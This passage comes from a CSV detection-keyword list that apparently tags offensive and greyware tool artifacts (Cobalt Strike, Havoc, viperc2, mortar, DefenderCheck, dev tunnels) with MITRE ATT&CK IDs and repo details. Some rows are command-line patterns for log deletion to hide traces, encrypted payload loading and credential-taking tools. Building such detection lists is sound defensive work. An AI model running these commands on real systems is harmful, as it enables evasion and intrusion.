and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*default_users_for_services_unhash.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*DefaultBeaconApi*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*DefaultCreds-cheat-sheet*,offensive_tool_keyword,DefaultCreds-cheat-sheet,One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password,T1110.001 - T1110.003,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/ihebski/DefaultCreds-cheat-sheet,1,1,N/A,N/A,10,4664,610,2023-07-15T22:16:49Z,2021-01-01T19:02:36Z 
-*--defaults-torrc*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,0,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*DefenderCheck*,offensive_tool_keyword,DefenderCheck,Quick tool to help make evasion work a little bit easier.Takes a binary as input and splits it until it pinpoints that exact byte that Microsoft Defender will flag on. and then prints those offending bytes to the screen. This can be helpful when trying to identify the specific bad pieces of code in your tool/payload.,T1027 - T1055 - T1562 - T1553,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/matterpreter/DefenderCheck,1,0,N/A,N/A,10,1918,340,2023-09-14T18:42:39Z,2019-04-09T14:03:46Z -*DefenderCheck.exe*,offensive_tool_keyword,DefenderCheck,Identifies the bytes that Microsoft Defender flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,1,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*DefenseEvasion_CodeSigning_PeSigningAuthHijack.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z 
-*DefenseEvasion_CodeSigning_StolenMircosoftWindowsSignature.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*DefenseEvasion_ProcessInjection_CobaltStrikeOnline.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*DefenseEvasion_ProcessInjection_CsharpAssemblyLoader.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*DefenseEvasion_ProcessInjection_CsharpAssemblyLoaderPlus.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*DefenseEvasion_ProcessInjection_ExampleModule.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*DefenseEvasion_ProcessInjection_PeLoader.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*DefenseEvasion_ProcessInjection_PowershellRunInMem.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*DefenseEvasion_ProcessInjection_ProcessHandle.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*DefenseEvasion_ProcessInjection_PythonRunInMem.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*DefenseEvasion_ProcessInjection_SessionClone.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*DefenseEvasion_ProcessInjection_ShellcodeLoader.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*DefenseEvasion_ProcessInjection_WindowsSystem.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*DefenseEvasion_SubvertTrustControls_CloneSSLPem.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*DeimosC2*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z
-*del *C:\Program Files*\TeamViewer\TeamViewer*_Logfile.log*,offensive_tool_keyword,malware,observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces,T1070,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*del *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*,offensive_tool_keyword,malware,observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces,T1070,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*deleg_enum_imp*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-*Delegation/delegation.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z
-*delegation_constrained_objects.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,0,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z
-*delegation_constrained_w_protocol_transition_objects.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,0,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z
-*delegation_rbcd_objects.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,0,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z
-*delegation_unconstrained_objects.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z
-*DelegationBOF.*,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,1,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z
-*deliver.exe -d -c * -f*.enc*,offensive_tool_keyword,mortar,red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions,T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562,TA0002 - TA0003 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/0xsp-SRD/mortar,1,0,N/A,N/A,10,1181,193,2022-08-03T03:38:57Z,2021-11-25T16:49:47Z
-*deliver.exe -d -f *.enc*,offensive_tool_keyword,mortar,red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions,T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562,TA0002 - TA0003 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/0xsp-SRD/mortar,1,0,N/A,N/A,10,1181,193,2022-08-03T03:38:57Z,2021-11-25T16:49:47Z
-*dementor.py -d * -u * -p *,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,0,rough PoC to connect to spoolss to elicit machine account authentication,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z
-*demo-bof.cna*,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,1,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z
-*demo-client.exe *,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,0,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z
-*demo-controller.exe *,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,0,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z
-*Dendrobate-master*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z
-*dendron*FileMonInject.dll*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z
-*deploycaptureserver.ps1*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z
-*DeployPrinterNightmare.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z
-*DesertNut.csproj*,offensive_tool_keyword,DesertNut,DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate),T1055.012 - T1546.008,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z
-*DesertNut.exe*,offensive_tool_keyword,DesertNut,DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate),T1055.012 - T1546.008,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z
-*DesertNut.sln*,offensive_tool_keyword,DesertNut,DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate),T1055.012 - T1546.008,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z
-*DesertNut_h.cs*,offensive_tool_keyword,DesertNut,DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate),T1055.012 - T1546.008,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z
-*-destPipe * -pipeHost * -bindPort *,offensive_tool_keyword,invoke-piper,Forward local or remote tcp ports through SMB pipes.,T1003.001 - T1048 - T1021.002 - T1021.001 - T1090,TA0002 -TA0006 - TA0008,N/A,N/A,Lateral movement,https://github.com/p3nt4/Invoke-Piper,1,0,N/A,N/A,3,284,60,2021-03-07T19:07:01Z,2017-08-03T08:06:44Z
-*details-c80a6994018b23dc.js*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z
-*detect ntdll.dll*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A
-*detect-hooksx64.*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/Detect-Hooks,1,1,N/A,10,10,138,28,2021-07-22T20:13:16Z,2021-07-22T18:58:23Z
-*devtunnel create *,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,0,N/A,8,10,N/A,N/A,N/A,N/A
-*devtunnel host -p *,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,0,N/A,8,10,N/A,N/A,N/A,N/A
-*devtunnel* user login -d*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,0,N/A,8,10,N/A,N/A,N/A,N/A
-*devtunnel.exe *,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,0,N/A,8,10,N/A,N/A,N/A,N/A
-*df64a3f4eb1348cba026ff85a86f39e11a979ce50a4b4af0b9cbd2acdfc90bf0*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*dfkdflfgjdajbhocmfjolpjbebdkcjog*,greyware_tool_keyword,Free Avira Phantom VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
